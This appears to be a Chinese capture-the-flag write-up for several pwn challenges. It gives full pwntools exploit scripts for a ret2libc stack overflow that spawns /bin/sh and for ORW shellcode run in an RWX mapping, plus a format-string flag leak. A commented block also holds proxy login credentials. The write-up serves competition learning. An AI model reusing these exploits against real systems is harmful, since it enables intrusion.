网络安全竞赛pwn全解及第一道ai的wp
先用ida看看
普通的菜单题,第一个这个比较的是字符的1234,所以输字符,输入2有栈溢出,打ret2libc即可。exp如下:
#!/usr/bin/env python3 |
from pwn import * |
import sys |
from ctypes import * |
#from pwncli import * |
import socks |
# cli_script() |
#from ae64 import AE64 |
#from pymao import * |
context.log_level='debug' |
context.arch='amd64' |
elf=ELF('./pwn') |
libc = ELF('./libc.so.6') |
# libc1=cdll.LoadLibrary('./libc.so.6') |
li='./libc.so.6' |
''' |
socks.set_default_proxy( |
socks.SOCKS5, |
"81.dart.ccsssc.com", |
25790, |
username="1nkvap1o", |
password="cl330rd", |
rdns=True |
) |
socket.socket = socks.socksocket |
''' |
flag = 1 |
if flag: |
p = remote('xt.xl-lab.top',33662) |
else: |
p = process('./pwn') |
sa = lambda s,n : p.sendafter(s,n) |
sla = lambda s,n : p.sendlineafter(s,n) |
sl = lambda s : p.sendline(s) |
slr = lambda s : p.sendline(str(s)) |
sd = lambda s : p.send(s) |
sdr = lambda s : p.send(str(s)) |
rc = lambda n : p.recv(n) |
ru = lambda s : p.recvuntil(s) |
ti = lambda : p.interactive() |
rcl = lambda : p.recvline() |
leak = lambda name,addr :log.success(name+"--->"+hex(addr)) |
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip()) |
i6 = lambda a : int(a,16) |
def csu(): |
pay=p64(0)+p64(0)+p64(1) |
return pay |
def ph(s): |
print(hex(s)) |
def dbg(): |
# context.terminal = ['tmux', 'splitw', '-h'] |
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star' |
pause() |
rdi=0x40129a |
back=0x40136F |
ret=0x401410 |
pu=elf.sym['puts'] |
puts=elf.got['puts'] |
sdr(2) |
pay=0x58*b'b'+flat(rdi,puts,pu,back) |
sd(pay) |
ru(b"\x1B[32m"+"发送完毕。".encode()+b"\x1B[0m\n") |
libcbase=u6(6)-libc.sym['puts'] |
sy=libcbase+libc.sym['system'] |
binsh=libcbase+next(libc.search(b'/bin/sh')) |
pay=0x58*b'b'+flat(ret,rdi,binsh,sy) |
sd(pay) |
ph(libcbase) |
ti() |
异步逃逸
这里ida没识别出来这个mmap64,看汇编
相当于这个mmap64(0,0x2000,7,0x22,0xffffffff,0)。简单来说就是分配了一段可读可写可执行的大小为0x2000的内存(第三个参数权限是7)后面就简单了,往v4写shellcode然后跳转过去执行,shellcode没任何限制。沙箱允许ORW,直接shellcraft生成就行了。exp如下:
#!/usr/bin/env python3 |
from pwn import * |
import sys |
from ctypes import * |
#from pwncli import * |
import socks |
# cli_script() |
#from ae64 import AE64 |
#from pymao import * |
context.log_level='debug' |
context.arch='amd64' |
elf=ELF('./pwn') |
''' |
socks.set_default_proxy( |
socks.SOCKS5, |
"81.dart.ccsssc.com", |
25790, |
username="1nkvap1o", |
password="cl330rd", |
rdns=True |
) |
socket.socket = socks.socksocket |
''' |
flag = 1 |
if flag: |
p = remote('xt.xl-lab.top',33583) |
else: |
p = process('./pwn') |
sa = lambda s,n : p.sendafter(s,n) |
sla = lambda s,n : p.sendlineafter(s,n) |
sl = lambda s : p.sendline(s) |
slr = lambda s : p.sendline(str(s)) |
sd = lambda s : p.send(s) |
sdr = lambda s : p.send(str(s)) |
rc = lambda n : p.recv(n) |
ru = lambda s : p.recvuntil(s) |
ti = lambda : p.interactive() |
rcl = lambda : p.recvline() |
leak = lambda name,addr :log.success(name+"--->"+hex(addr)) |
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip()) |
i6 = lambda a : int(a,16) |
def csu(): |
pay=p64(0)+p64(0)+p64(1) |
return pay |
def ph(s): |
print(hex(s)) |
def dbg(): |
# context.terminal = ['tmux', 'splitw', '-h'] |
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star' |
pause() |
pay=asm(shellcraft.open(b'./flag',0))+asm(shellcraft.read(3,0x4AD2BC,0x100))+asm(shellcraft.write(1,0x4AD2BC,0x100)) |
sd(pay) |
ti() |
蜜雪冰城
前面的没啥意思不看了,直接看漏洞点
这里首先把flag写到栈上了,然后有格式化字符串漏洞,看后面可以知道是在会员的积分那里有格式化字符串漏洞。直接%p读出来flag的信息,再用cyberchef的大端转化成小端和hex转字符串就可以读出来flag了。就演示第一段吧,虽然是web,但漏洞还是一样的。
从%8$p一直读到13就可以了